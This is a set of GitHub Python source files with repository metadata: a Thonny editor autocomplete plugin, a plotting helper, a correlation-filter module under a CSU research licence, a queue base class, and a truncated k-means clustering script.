] | null | null | null | thonny/plugins/autocomplete.py | aroberge/thonny | 919769139c9cbfdfa2b78f6a6f0a3d9ecee56e28 | [
"MIT"
] | null | null | null | thonny/plugins/autocomplete.py | aroberge/thonny | 919769139c9cbfdfa2b78f6a6f0a3d9ecee56e28 | [
"MIT"
] | null | null | null | import tkinter as tk
from tkinter import messagebox
from thonny import get_runner, get_workbench
from thonny.codeview import CodeViewText
from thonny.common import InlineCommand
from thonny.shell import ShellText
# TODO: adjust the window position in cases where it's too close to bottom or right edge - but make sure the current line is shown
"""Completions get computed on the backend, therefore getting the completions is
asynchronous.
"""
class Completer(tk.Listbox):
def __init__(self, text):
tk.Listbox.__init__(
self,
master=text,
font="SmallEditorFont",
activestyle="dotbox",
exportselection=False,
)
self.text = text
self.completions = []
self.doc_label = tk.Label(
master=text, text="Aaappiiiii", bg="#ffffe0", justify="left", anchor="nw"
)
# Auto indenter will eat up returns, therefore I need to raise the priority
# of this binding
self.text_priority_bindtag = "completable" + str(self.text.winfo_id())
self.text.bindtags((self.text_priority_bindtag,) + self.text.bindtags())
self.text.bind_class(
self.text_priority_bindtag, "<Key>", self._on_text_keypress, True
)
self.text.bind(
"<<TextChange>>", self._on_text_change, True
) # Assuming TweakableText
# for cases when Listbox gets focus
self.bind("<Escape>", self._close)
self.bind("<Return>", self._insert_current_selection)
self.bind("<Double-Button-1>", self._insert_current_selection)
self._bind_result_event()
def _bind_result_event(self):
# TODO: remove binding when editor gets closed
get_workbench().bind(
"editor_autocomplete_response", self._handle_backend_response, True
)
def handle_autocomplete_request(self):
row, column = self._get_position()
source = self.text.get("1.0", "end-1c")
get_runner().send_command(
InlineCommand(
"editor_autocomplete",
source=source,
row=row,
column=column,
filename=self._get_filename(),
)
)
def _handle_backend_response(self, msg):
row, column = self._get_position()
source = self.text.get("1.0", "end-1c")
if msg.source != source or msg.row != row or msg.column != column:
# situation has changed, information is obsolete
self._close()
elif msg.error:
self._close()
messagebox.showerror(
"Autocomplete error", msg.error, parent=get_workbench()
)
else:
self._present_completions(msg.completions)
def _present_completions(self, completions):
self.completions = completions
# broadcast logging info
row, column = self._get_position()
get_workbench().event_generate(
"AutocompleteProposal",
text_widget=self.text,
row=row,
column=column,
proposal_count=len(completions),
)
# present
if len(completions) == 0:
self._close()
elif len(completions) == 1:
self._insert_completion(completions[0]) # insert the only completion
self._close()
else:
self._show_box(completions)
def _show_box(self, completions):
self.delete(0, self.size())
self.insert(
0,
*[
c["name"] + ("=" if c["complete"].endswith("=") else "")
for c in completions
]
)
self.activate(0)
self.selection_set(0)
# place box
if not self._is_visible():
# _, _, _, list_box_height = self.bbox(0)
height = 100 # min(150, list_box_height * len(completions) * 1.15)
typed_name_length = len(completions[0]["name"]) - len(
completions[0]["complete"]
)
text_box_x, text_box_y, _, text_box_height = self.text.bbox(
"insert-%dc" % typed_name_length
)
# should the box appear below or above cursor?
space_below = self.master.winfo_height() - text_box_y - text_box_height
space_above = text_box_y
if space_below >= height or space_below > space_above:
height = min(height, space_below)
y = text_box_y + text_box_height
else:
height = min(height, space_above)
y = text_box_y - height
width = 400
self.place(x=text_box_x, y=y, width=width, height=height)
self._update_doc()
def _update_doc(self):
c = self._get_selected_completion()
if c is None:
self.doc_label["text"] = ""
self.doc_label.place_forget()
else:
docstring = c.get("docstring", None)
if docstring:
self.doc_label["text"] = docstring
self.doc_label.place(
x=self.winfo_x() + self.winfo_width(),
y=self.winfo_y(),
width=400,
height=self.winfo_height(),
)
else:
self.doc_label["text"] = ""
self.doc_label.place_forget()
def _is_visible(self):
return self.winfo_ismapped()
def _insert_completion(self, completion):
typed_len = len(completion["name"]) - len(completion["complete"].strip("="))
typed_prefix = self.text.get("insert-{}c".format(typed_len), "insert")
get_workbench().event_generate(
"AutocompleteInsertion",
text_widget=self.text,
typed_prefix=typed_prefix,
completed_name=completion["name"],
)
if self._is_visible():
self._close()
if not completion["name"].startswith(typed_prefix):
# eg. case of the prefix was not correct
self.text.delete("insert-{}c".format(typed_len), "insert")
self.text.insert("insert", completion["name"])
else:
self.text.insert("insert", completion["complete"])
def _get_filename(self):
# TODO: allow completing in shell
if not isinstance(self.text, CodeViewText):
return None
codeview = self.text.master
editor = get_workbench().get_editor_notebook().get_current_editor()
if editor.get_code_view() is codeview:
return editor.get_filename()
else:
return None
def _move_selection(self, delta):
selected = self.curselection()
if len(selected) == 0:
index = 0
else:
index = selected[0]
index += delta
index = max(0, min(self.size() - 1, index))
self.selection_clear(0, self.size() - 1)
self.selection_set(index)
self.activate(index)
self.see(index)
self._update_doc()
def _get_request_id(self):
return "autocomplete_" + str(self.text.winfo_id())
def _get_position(self):
return map(int, self.text.index("insert").split("."))
def _on_text_keypress(self, event=None):
if not self._is_visible():
return None
if event.keysym == "Escape":
self._close()
return "break"
elif event.keysym in ["Up", "KP_Up"]:
self._move_selection(-1)
return "break"
elif event.keysym in ["Down", "KP_Down"]:
self._move_selection(1)
return "break"
elif event.keysym in ["Return", "KP_Enter", "Tab"]:
assert self.size() > 0
self._insert_current_selection()
return "break"
return None
def _insert_current_selection(self, event=None):
self._insert_completion(self._get_selected_completion())
def _get_selected_completion(self):
sel = self.curselection()
if len(sel) != 1:
return None
return self.completions[sel[0]]
def _on_text_change(self, event=None):
if self._is_visible():
self.handle_autocomplete_request()
def _close(self, event=None):
self.place_forget()
self.doc_label.place_forget()
self.text.focus_set()
def on_text_click(self, event=None):
if self._is_visible():
self._close()
class ShellCompleter(Completer):
def _bind_result_event(self):
# TODO: remove binding when editor gets closed
get_workbench().bind(
"shell_autocomplete_response", self._handle_backend_response, True
)
def handle_autocomplete_request(self):
source = self._get_prefix()
get_runner().send_command(InlineCommand("shell_autocomplete", source=source))
def _handle_backend_response(self, msg):
# check if the response is relevant for current state
if msg.source != self._get_prefix():
self._close()
else:
self._present_completions(msg.completions)
def _get_prefix(self):
return self.text.get("input_start", "insert") # TODO: allow multiple line input
def handle_autocomplete_request(event=None):
if event is None:
text = get_workbench().focus_get()
else:
text = event.widget
_handle_autocomplete_request_for_text(text)
def _handle_autocomplete_request_for_text(text):
if not hasattr(text, "autocompleter"):
if isinstance(text, (CodeViewText, ShellText)):
if isinstance(text, CodeViewText):
text.autocompleter = Completer(text)
elif isinstance(text, ShellText):
text.autocompleter = ShellCompleter(text)
text.bind("<1>", text.autocompleter.on_text_click)
else:
return
text.autocompleter.handle_autocomplete_request()
def patched_perform_midline_tab(text, event):
if isinstance(text, ShellText):
option_name = "edit.tab_complete_in_shell"
else:
option_name = "edit.tab_complete_in_editor"
if get_workbench().get_option(option_name):
if not text.has_selection():
_handle_autocomplete_request_for_text(text)
return "break"
else:
return None
return text.perform_smart_tab(event)
def load_plugin() -> None:
get_workbench().add_command(
"autocomplete",
"edit",
_("Auto-complete"),
handle_autocomplete_request,
default_sequence="<Control-space>"
# TODO: tester
)
get_workbench().set_default("edit.tab_complete_in_editor", True)
get_workbench().set_default("edit.tab_complete_in_shell", True)
CodeViewText.perform_midline_tab = patched_perform_midline_tab # type: ignore
ShellText.perform_midline_tab = patched_perform_midline_tab # type: ignore
| 31.731988 | 130 | 0.593407 |
fc13e2f330dbcc1f63bbf4a3976928b70e6368a5 | 4,447 | py | Python | DataVisulization.py | Islanderrobotics/data-visulization | b3e66073b65554a0ffd63918a75c4e13bca591f8 | [
"MIT"
] | null | null | null | DataVisulization.py | Islanderrobotics/data-visulization | b3e66073b65554a0ffd63918a75c4e13bca591f8 | [
"MIT"
] | null | null | null | DataVisulization.py | Islanderrobotics/data-visulization | b3e66073b65554a0ffd63918a75c4e13bca591f8 | [
"MIT"
] | null | null | null | import matplotlib.pyplot as plt
import pandas as pd
from PyQt5 import QtWidgets
import math
import sys
class NotAnOpption(Exception):
pass
class NeedsToBeATuple(Exception):
pass
class MissingColumnNames(Exception):
pass
class DataVisulization:
def __init__(self, data = None,type_of_plot = "", column_values_for_x = None, column_values_for_y = None,alpha = None):
self.data = data
self.alpha = alpha
self.x = column_values_for_x
self.y = column_values_for_y
self.type_of_plot = type_of_plot
plt.rcParams["figure.figsize"]= self.FindingScreenSize_()
if type_of_plot.upper() == "HIST":
self.Hist()
elif(self.x is not None and self.y is not None):
if type_of_plot.upper() == "LINE":
self.Line()
elif type_of_plot.upper() == "SCATTER":
self.Scatter()
elif(self.x is None or self.y is None):
raise MissingColumnNames(column_values_for_x and column_values_for_y)
else:
raise NotAnOpption
def FindingScreenSize_(self):
app = QtWidgets.QApplication(sys.argv)
screen = app.primaryScreen()
size = screen.size()
Screensize = (size.width()/96, size.height()/96)
return Screensize
def ByeByeText(self,df,varlist):
copy = df.copy()
count= 0
if (isinstance(varlist,str)):
if(copy[varlist].dtype == "object"):
print("that will cause an error")
else:
for i in varlist:
if (copy[i].dtype == "object"):
varlist.pop(count)
copy.drop(columns= i, inplace=True)
count+=1
return (copy)
def Hist(self):
final_size = self.FindingScreenSize_()
self.data.hist(figsize= final_size)
plt.show()
def Line(self):
if (isinstance(self.y, list)):
self.DfLine()
else:
plt.plot(self.x,self.y)
def DfLine(self):
count = 1
if (isinstance(self.y,list)):
copy = self.ByeByeText(self.data,self.y)
for i in self.y:
if (math.sqrt(len(self.y)).is_integer()):
plt.subplot(round(math.sqrt(len(self.y))),round(math.sqrt(len(self.y))),count)
else:
plt.subplot(round(math.sqrt(len(self.y))) + 1, round(math.sqrt(len(self.y))), count)
plt.plot(copy[self.x], copy[i])
count += 1
elif (isinstance(self.x, list)):
copy = self.ByeByeText(self.data, self.x)
for i in self.x:
if math.sqrt(len(self.x)).is_integer():
plt.subplot(round(math.sqrt(len(self.x))), round(math.sqrt(len(self.x))), count)
else:
plt.subplot(round(math.sqrt(len(self.x))) + 1, round(math.sqrt(len(self.x))), count)
plt.plot(copy[i], copy[self.y])
count += 1
else:
plt.plot(self.data[self.x], y=self.data[self.y])
plt.show()
def Scatter(self):
if (isinstance(self.data, pd.DataFrame)):
self.Dfscatter()
else:
plt.scatter(x=self.x, y=self.y, alpha=self.alpha)
def Dfscatter(self):
count = 1
if (isinstance(self.y, list)):
copy = self.ByeByeText(self.data, self.y)
for i in self.y:
if (math.sqrt(len(self.y)).is_integer()):
plt.subplot(round(math.sqrt(len(self.y))), round(math.sqrt(len(self.y))), count)
else:
plt.subplot(round(math.sqrt(len(self.y))) + 1, round(math.sqrt(len(self.y))), count)
plt.scatter(copy[self.x], copy[i], alpha=self.alpha)
count += 1
elif (isinstance(self.x, list)):
copy = self.ByeByeText(self.data, self.x)
for i in self.x:
if (math.sqrt(len(self.x)).is_integer()):
plt.subplot(round(math.sqrt(len(self.x))), round(math.sqrt(len(self.x))), count)
else:
plt.subplot(round(math.sqrt(len(self.x))) + 1, round(math.sqrt(len(self.x))), count)
plt.scatter(copy[i], copy[self.y], alpha=self.alpha)
count += 1
else:
plt.scatter(self.data[self.x], y=self.data[self.y])
plt.show() | 37.686441 | 123 | 0.53969 |
7e9e8d89aaa35444aee0dc3a001cc53d16e8d4f9 | 16,346 | py | Python | scripts/ocof/filters/common.py | wolfram2012/ros_track_ssd | c98d54eb923e5bae5fde4abbedda2fe5ba716606 | [
"MIT"
] | null | null | null | scripts/ocof/filters/common.py | wolfram2012/ros_track_ssd | c98d54eb923e5bae5fde4abbedda2fe5ba716606 | [
"MIT"
] | null | null | null | scripts/ocof/filters/common.py | wolfram2012/ros_track_ssd | c98d54eb923e5bae5fde4abbedda2fe5ba716606 | [
"MIT"
] | null | null | null | # Copyright 2010, David S. Bolme, Colorado State University Research
# Foundation
#
# Colorado State University Software Evaluation License Agreement
#
# This license agreement ("License"), effective today, is made by and between
# you (hereinafter referred to as the "Licensee") and the Board of Governors of
# the Colorado State University System acting by and through Colorado State
# University, an institution of higher education of the State of Colorado,
# located at Fort Collins, Colorado, 80523-2002 ("CSU"), and concerns certain
# software described as "Correlation Filters for Detection, Recognition, and
# Registration," a system of software programs for advanced video signal
# processing and analysis.
#
# 1. General. A non-exclusive, nontransferable, perpetual license is granted
# to the Licensee to install and use the Software for academic, non-profit,
# or government-sponsored research purposes. Use of the Software under this
# License is restricted to non-commercial purposes. Commercial use of the
# Software requires a separately executed written license agreement.
#
# 2. Permitted Use and Restrictions. Licensee agrees that it will use the
# Software, and any modifications, improvements, or derivatives to the
# Software that the Licensee may create (collectively, "Improvements")
# solely for internal, non-commercial purposes and shall not distribute,
# transfer, deploy, or externally expose the Software or Improvements to any
# person or third parties without prior written permission from CSU. The
# term "non-commercial," as used in this License, means academic or other
# scholarly research which (a) is not undertaken for profit, or (b) is not
# intended to produce works, services, or data for commercial use, or (c) is
# neither conducted, nor funded, by a person or an entity engaged in the
# commercial use, application or exploitation of works similar to the
# Software.
#
# 3. Ownership and Assignment of Copyright. The Licensee acknowledges that
# CSU has the right to offer this copyright in the Software and associated
# documentation only to the extent described herein, and the offered
# Software and associated documentation are the property of CSU. The
# Licensee agrees that any Improvements made by Licensee shall be subject
# to the same terms and conditions as the Software. Licensee agrees not to
# assert a claim of infringement in Licensee copyrights in Improvements in
# the event CSU prepares substantially similar modifications or derivative
# works. The Licensee agrees to use his/her reasonable best efforts to
# protect the contents of the Software and to prevent unauthorized
# disclosure by its agents, officers, employees, and consultants. If the
# Licensee receives a request to furnish all or any portion of the Software
# to a third party, Licensee will not fulfill such a request but will refer
# the third party to the CSU Computer Science website
# http://www.cs.colostate.edu/~vision/ocof.html so that the third party's
# use of this Software will be subject to the terms and conditions of this
# License. Notwithstanding the above, Licensee may disclose any
# Improvements that do not involve disclosure of the Software.
#
# 4. Copies. The Licensee may make a reasonable number of copies of the
# Software for the purposes of backup, maintenance of the Software or the
# development of derivative works based on the Software. These additional
# copies shall carry the copyright notice and shall be controlled by this
# License, and will be destroyed along with the original by the Licensee
# upon termination of the License.
#
# 5. Acknowledgement. Licensee agrees that any publication of results obtained
# with the Software will acknowledge its use by an appropriate citation as
# specified in the documentation.
#
# 6. Acknowledgment. CSU acknowledges that the Software executes patent pending
# Algorithms for the purpose of non-commercial uses. Licensee acknowledges
# that this Agreement does not constitute a commercial license to the
# Algorithms. Licensee may apply for a commercial license to the Algorithms
# from Colorado State University Research Foundation by visiting
# http://www.csuventures.org.
#
# 7. Disclaimer of Warranties and Limitation of Liability. THE SOFTWARE IS
# PROVIDED "AS IS," WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
# AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. CSU MAKES NO
# REPRESENTATION OR WARRANTY THAT THE SOFTWARE WILL NOT INFRINGE ANY PATENT
# OR OTHER PROPRIETARY RIGHT. IN NO EVENT SHALL CSU BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
#
# 8. Termination. This License is effective until terminated by either party.
# Your rights under this License will terminate automatically without notice
# from CSU if you fail to comply with any term(s) of this License. Upon
# termination of this License, you shall immediately discontinue all use of
# the Software and destroy the original and all copies, full or partial, of
# the Software, including any modifications or derivative works, and
# associated documentation.
#
# 9. Governing Law and General Provisions. This License shall be governed by
# the laws of the State of Colorado, excluding the application of its
# conflicts of law rules. This License shall not be governed by the United
# Nations Convention on Contracts for the International Sale of Goods, the
# application of which is expressly excluded. If any provisions of this
# License are held invalid or unenforceable for any reason, the remaining
# provisions shall remain in full force and effect. This License is binding
# upon any heirs and assigns of the Licensee. The License granted to
# Licensee hereunder may not be assigned or transferred to any other person
# or entity without the express consent of the Regents. This License
# constitutes the entire agreement between the parties with respect to the
# use of the Software licensed hereunder and supersedes all other previous
# or contemporaneous agreements or understandings between the parties,
# whether verbal or written, concerning the subject matter.
'''
This
Created on Apr 18, 2010
@author: bolme
'''
import numpy as np
import pyvision as pv
import scipy as sp
import scipy.ndimage
class CorrelationFilter:
''' This class implements many methods and interfaces that are common to all filters. '''
def __init__(self, size, norm_log=False, norm_meanunit=True, norm_window = pv.cosineWindow, bbox=None, ilog=None):
'''Initial some of the basic elements of the correlation filter.'''
# Set the size of this filter
self.size = size
# Setup Normalization Steps
self.norm_log = norm_log
self.norm_meanunit = norm_meanunit
self.norm_window = norm_window
# Only search for peaks in this bounding box
self.bbox = bbox
# A member variable for the filter stored in the fourier domain
self.filter = None
# Caches used for resized versions of the filter and windows
self.window_cache = {}
self.filter_cache = {}
# Fast Local Maximum Detector (Created when first needed)
self.maximum_detector = None
def preprocess(self, tile, ilog=None):
''' Implements some standard preprocessing for all filters. '''
# Get the image tile as a numpy matrix.
if isinstance(tile,pv.Image):
mat = tile.asMatrix2D()
else:
# Assume it is already a matrix
mat = tile
# Apply a logarithmic transformation to pixel values.
if self.norm_log:
mat = np.log(mat + 1)
# print "tile is:",mat
# Transform pixel values to have a mean of zero and unit length
if self.norm_meanunit:
mat = pv.meanUnit(mat)
# print "mat is:",mat
# Window the input tile to reduce fourier edge effects.
window = self._resizeWindow(mat.shape)
if window is not None:
mat = mat * window
if ilog != None:
ilog(pv.Image(mat),label="PREPROCESSED")
return mat
def addTraining(self, tile, output, ilog=None):
''' Add training data. This method should be overridden by sub classes. Subclasses should compute the filter and assign the Fourier domain filter to the member variable self.filter'''
raise NotImplementedError()
def train(self,ilog=None):
'''This should be overridden by subclasses. Subclasses should compute the filter and assign the Fourier domain filter to the member variable self.filter'''
raise NotImplementedError()
def correlate(self, tile, F=None, phase_only=False, ilog=None):
''''''
# Correlate with the filter
if F == None:
# Preprocess the image
mat = self.preprocess(tile,ilog=ilog)
F = np.fft.fft2(mat)
G = self._resizeFilter(F.shape) * F
if phase_only:
G = G/np.abs(G)
g = np.fft.ifft2(G)
# Return just the real part
return g.real
def locate(self, tile, corr=None, subpixel_est=True, bbox=None, ilog=None):
''''''
if corr == None:
corr = self.correlate(tile,ilog=ilog)
if bbox == None:
bbox = self.bbox
if bbox:
#print "CorrShape:",corr.shape
idx = corr[bbox[0]:bbox[1],bbox[2]:bbox[3]].argmax()
_,h = corr[bbox[0]:bbox[1],bbox[2]:bbox[3]].shape
x = bbox[0]+idx/h
y = bbox[2]+idx%h
else:
idx = corr.argmax()
_,h = corr.shape
x = idx/h
y = idx%h
if subpixel_est:
dx,dy = subpixel(corr[x-3:x+4,y-3:y+4])
x += dx
y += dy
return pv.Point(x,y)
def detect(self,tile,corr=None,compute_psrs=False,ilog=None):
if corr == None:
corr = self.correlate(tile,ilog=ilog)
# Create the maximum detector the first time it is needed
if self.maximum_detector == None:
self.maximum_detector = pv.LocalMaximumDetector()
# Find local maximums in the filter response
points, values = self.maximum_detector(corr,threshold=0.0)
if compute_psrs:
# Compute psrs
w,h = corr.shape
corrf = corr.flatten()
psrs = []
for x,y in points:
pk = corr[x,y]
# Mask out the sidelobe
mask = np.zeros([w,h],dtype=np.bool)
mask[x-10:x+11,y-10:y+11] = True
mask[x-5:x+6,y-5:y+6] = False
mask = mask.flatten()
sidelobe = corrf[mask]
# compute the psr
mn = sidelobe.mean()
sd = sidelobe.std()
psr = (pk-mn)/sd
if np.isnan(psr):
psrs.append(0)
else:
psrs.append(psr)
points = [pv.Point(x,y) for x,y in points]
if compute_psrs:
return np.array(points), values, np.array(psrs)
return np.array(points), values
def psr(self, tile, corr=None, ilog=None):
'''
Compute the peak to sidelobe ratio. This is a good measure of quality.
'''
if corr == None:
corr = self.correlate(tile,ilog=ilog)
rows,cols = corr.shape
# Find the peak
i = corr.argmax()
x,y = i/cols, i%cols
corr = corr.flatten()
pk = corr[i]
# Mask out the sidelobe
mask = np.ones([rows,cols],dtype=np.bool)
mask[x-5:x+6,y-5:y+6] = False
mask = mask.flatten()
sidelobe = corr[mask]
# compute the psr
mn = sidelobe.mean()
sd = sidelobe.std()
return (pk-mn)/sd
def asImage(self, ilog=None):
''''''
mat = np.fft.ifft2(self.filter.conj())
mat = np.fft.fftshift(mat)
return pv.Image(mat.real)
def asSpectrum(self):
return self.filter*self.filter.conj()
def scale(self,scale,order=3):
'''
Create a scaled copy of the correlation filter.
@param scale: a scale factor.
@param order: the order of spline interpolation.
@returns: A rescaled correlation filter
@rtype: ocof.CorrelationFilter
'''
filter = np.fft.ifft2(self.filter)
filter = sp.ndimage.zoom(filter,scale,order=order)
result = CorrelationFilter(self.size, norm_log=self.norm_log, norm_meanunit=self.norm_meanunit, norm_window = self.norm_window, bbox=self.bbox)
result.filter = np.fft.fft2(filter)
return result
def _resizeFilter(self,size):
'''
Resize the filter
'''
if size == self.filter.shape:
return self.filter
if not self.filter_cache.has_key(size):
filter = np.fft.ifft2(self.filter)
w,h = size
fw,fh = filter.shape
tmp = np.zeros((w,h), np.complex128) #TODO: check this
w = min(w,fw)
h = min(h,fh)
tmp[ :w/2, :h/2] = filter[ :w/2, :h/2]
tmp[ :w/2,-h/2:] = filter[ :w/2,-h/2:]
tmp[-w/2:,-h/2:] = filter[-w/2:,-h/2:]
tmp[-w/2:, :h/2] = filter[-w/2:, :h/2]
self.filter_cache[size] = np.fft.fft2(tmp)
return self.filter_cache[size]
def _resizeWindow(self,size):
if self.norm_window == None:
return None
if not self.window_cache.has_key(size):
window = self.norm_window(size)
self.window_cache[size] = window
return self.window_cache[size]
def subpixel(b):
# TODO: Locations may always be estimated low
w,h = b.shape
x = np.arange(w).reshape((w,1)) * np.ones((1,h)) - w/2
y = np.arange(h).reshape((1,h)) * np.ones((w,1)) - w/2
x = x.flatten()
y = y.flatten()
c = np.ones((w,h)).flatten()
A = np.array([x*x,x,y*y,y,c]).transpose()
b = b.flatten()
try:
coef = np.linalg.lstsq(A,b)
except:
return 0.0,0.0
a,b,c,d,_ = coef[0]
x = -b/a
y = -d/c
if x > 1 or x < -1 or y > 1 or y < -1:
return 0.0,0.0
return x,y
def createPointTarget(x,y,size,sigma=2.0,**kwargs):
'''Create a target with a Gaussian shaped peak of 1.0 at x,y and is 0.0 everywhere else.'''
x = np.arange(size[0])-x
y = np.arange(size[1])-y
scale = 1.0/(sigma*sigma)
target = np.exp(-scale*x*x).reshape(size[0],1)*np.exp(-scale*y*y).reshape(1,size[1])
return target
def createDeltaTarget(x,y,size,**kwargs):
'''Create a target that has a value of 1.0 at x,y and is 0.0 everywhere else.'''
x = int(round(x))
y = int(round(y))
target = np.zeros(size,dtype=np.float64)
target[x,y] = 1.0
return target
| 38.28103 | 193 | 0.617643 |
b4640cd42f81db86c34b5fc2981d8d05cf3de419 | 1,229 | py | Python | src/ds/queue/queue_abc.py | MitraThakker/DataStructuresInPython | 96bd661821e5aa082caf55f027090f8a2c602158 | [
"MIT"
] | 2 | 2019-03-28T07:46:52.000Z | 2019-03-28T07:46:52.000Z | src/ds/queue/queue_abc.py | MitraThakker/DataStructuresInPython | 96bd661821e5aa082caf55f027090f8a2c602158 | [
"MIT"
] | null | null | null | src/ds/queue/queue_abc.py | MitraThakker/DataStructuresInPython | 96bd661821e5aa082caf55f027090f8a2c602158 | [
"MIT"
] | null | null | null | from abc import ABC, abstractmethod
from src.errors import (
QueueOverflow,
QueueUnderflow
)
class Queue(ABC):
def __init__(self, capacity: int = 16):
self.__q = list()
self.capacity = capacity
@property
def q(self):
return self.__q
@abstractmethod
def enqueue(self, item):
if len(self.q) == self.capacity:
raise QueueOverflow
self.q.append(item)
@abstractmethod
def dequeue(self):
try:
return self.q.pop(0)
except IndexError:
raise QueueUnderflow
@abstractmethod
def peek(self):
try:
return self.q[0]
except IndexError:
raise QueueUnderflow
@abstractmethod
def is_full(self):
return len(self.q) == self.capacity
@abstractmethod
def is_empty(self):
return len(self.q) == 0
@abstractmethod
def __str__(self):
output_str = 'F|'
for i in self.q:
output_str += f' {i} |'
output_str += 'R'
return output_str
@abstractmethod
def __len__(self):
return len(self.q)
@abstractmethod
def __contains__(self, item):
return item in self.q
| 20.147541 | 43 | 0.57201 |
89ea0503d4c57583aafa4e13c30ce7035bb79660 | 73 | py | Python | location/__init__.py | ohahlev/ahlev-django-location | 7d6060ab7b21509f53790f5863b596f2b95c286a | [
"BSD-3-Clause"
] | null | null | null | location/__init__.py | ohahlev/ahlev-django-location | 7d6060ab7b21509f53790f5863b596f2b95c286a | [
"BSD-3-Clause"
] | null | null | null | location/__init__.py | ohahlev/ahlev-django-location | 7d6060ab7b21509f53790f5863b596f2b95c286a | [
"BSD-3-Clause"
] | null | null | null | __version__ = '0.0.1'
default_app_config = 'location.apps.LocationConfig' | 36.5 | 51 | 0.794521 |
b44012476dcbb844bbfc20d20557a77c55b1cc84 | 13,262 | py | Python | machine_learning/k_means_clust.py | TeddyFirman/Algorithm_Python | edbd50a97a62c2beb2a187e4c411c677aa43115e | [
"MIT"
] | null | null | null | machine_learning/k_means_clust.py | TeddyFirman/Algorithm_Python | edbd50a97a62c2beb2a187e4c411c677aa43115e | [
"MIT"
] | null | null | null | machine_learning/k_means_clust.py | TeddyFirman/Algorithm_Python | edbd50a97a62c2beb2a187e4c411c677aa43115e | [
"MIT"
] | null | null | null | """README, Author - Anurag Kumar(mailto:anuragkumarak95@gmail.com)
Requirements:
- sklearn
- numpy
- matplotlib
Python:
- 3.5
Inputs:
- X , a 2D numpy array of features.
- k , number of clusters to create.
- initial_centroids , initial centroid values generated by utility function(mentioned
in usage).
- maxiter , maximum number of iterations to process.
- heterogeneity , empty list that will be filled with hetrogeneity values if passed
to kmeans func.
Usage:
1. define 'k' value, 'X' features array and 'hetrogeneity' empty list
2. create initial_centroids,
initial_centroids = get_initial_centroids(
X,
k,
seed=0 # seed value for initial centroid generation,
# None for randomness(default=None)
)
3. find centroids and clusters using kmeans function.
centroids, cluster_assignment = kmeans(
X,
k,
initial_centroids,
maxiter=400,
record_heterogeneity=heterogeneity,
verbose=True # whether to print logs in console or not.(default=False)
)
4. Plot the loss function, hetrogeneity values for every iteration saved in
hetrogeneity list.
plot_heterogeneity(
heterogeneity,
k
)
5. Transfers Dataframe into excel format it must have feature called
'Clust' with k means clustering numbers in it.
"""
import warnings
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
from sklearn.metrics import pairwise_distances
warnings.filterwarnings("ignore")
TAG = "K-MEANS-CLUST/ "
def get_initial_centroids(data, k, seed=None):
"""Randomly choose k data points as initial centroids"""
if seed is not None: # useful for obtaining consistent results
np.random.seed(seed)
n = data.shape[0] # number of data points
# Pick K indices from range [0, N).
rand_indices = np.random.randint(0, n, k)
# Keep centroids as dense format, as many entries will be nonzero due to averaging.
# As long as at least one document in a cluster contains a word,
# it will carry a nonzero weight in the TF-IDF vector of the centroid.
centroids = data[rand_indices, :]
return centroids
def centroid_pairwise_dist(X, centroids):
return pairwise_distances(X, centroids, metric="euclidean")
def assign_clusters(data, centroids):
# Compute distances between each data point and the set of centroids:
# Fill in the blank (RHS only)
distances_from_centroids = centroid_pairwise_dist(data, centroids)
# Compute cluster assignments for each data point:
# Fill in the blank (RHS only)
cluster_assignment = np.argmin(distances_from_centroids, axis=1)
return cluster_assignment
def revise_centroids(data, k, cluster_assignment):
new_centroids = []
for i in range(k):
# Select all data points that belong to cluster i. Fill in the blank (RHS only)
member_data_points = data[cluster_assignment == i]
# Compute the mean of the data points. Fill in the blank (RHS only)
centroid = member_data_points.mean(axis=0)
new_centroids.append(centroid)
new_centroids = np.array(new_centroids)
return new_centroids
def compute_heterogeneity(data, k, centroids, cluster_assignment):
heterogeneity = 0.0
for i in range(k):
# Select all data points that belong to cluster i. Fill in the blank (RHS only)
member_data_points = data[cluster_assignment == i, :]
if member_data_points.shape[0] > 0: # check if i-th cluster is non-empty
# Compute distances from centroid to data points (RHS only)
distances = pairwise_distances(
member_data_points, [centroids[i]], metric="euclidean"
)
squared_distances = distances ** 2
heterogeneity += np.sum(squared_distances)
return heterogeneity
def plot_heterogeneity(heterogeneity, k):
plt.figure(figsize=(7, 4))
plt.plot(heterogeneity, linewidth=4)
plt.xlabel("# Iterations")
plt.ylabel("Heterogeneity")
plt.title(f"Heterogeneity of clustering over time, K={k:d}")
plt.rcParams.update({"font.size": 16})
plt.show()
def kmeans(
data, k, initial_centroids, maxiter=500, record_heterogeneity=None, verbose=False
):
"""This function runs k-means on given data and initial set of centroids.
maxiter: maximum number of iterations to run.(default=500)
record_heterogeneity: (optional) a list, to store the history of heterogeneity
as function of iterations
if None, do not store the history.
verbose: if True, print how many data points changed their cluster labels in
each iteration"""
centroids = initial_centroids[:]
prev_cluster_assignment = None
for itr in range(maxiter):
if verbose:
print(itr, end="")
# 1. Make cluster assignments using nearest centroids
cluster_assignment = assign_clusters(data, centroids)
# 2. Compute a new centroid for each of the k clusters, averaging all data
# points assigned to that cluster.
centroids = revise_centroids(data, k, cluster_assignment)
# Check for convergence: if none of the assignments changed, stop
if (
prev_cluster_assignment is not None
and (prev_cluster_assignment == cluster_assignment).all()
):
break
# Print number of new assignments
if prev_cluster_assignment is not None:
num_changed = np.sum(prev_cluster_assignment != cluster_assignment)
if verbose:
print(
" {:5d} elements changed their cluster assignment.".format(
num_changed
)
)
# Record heterogeneity convergence metric
if record_heterogeneity is not None:
# YOUR CODE HERE
score = compute_heterogeneity(data, k, centroids, cluster_assignment)
record_heterogeneity.append(score)
prev_cluster_assignment = cluster_assignment[:]
return centroids, cluster_assignment
# Mock test below
if False: # change to true to run this test case.
from sklearn import datasets as ds
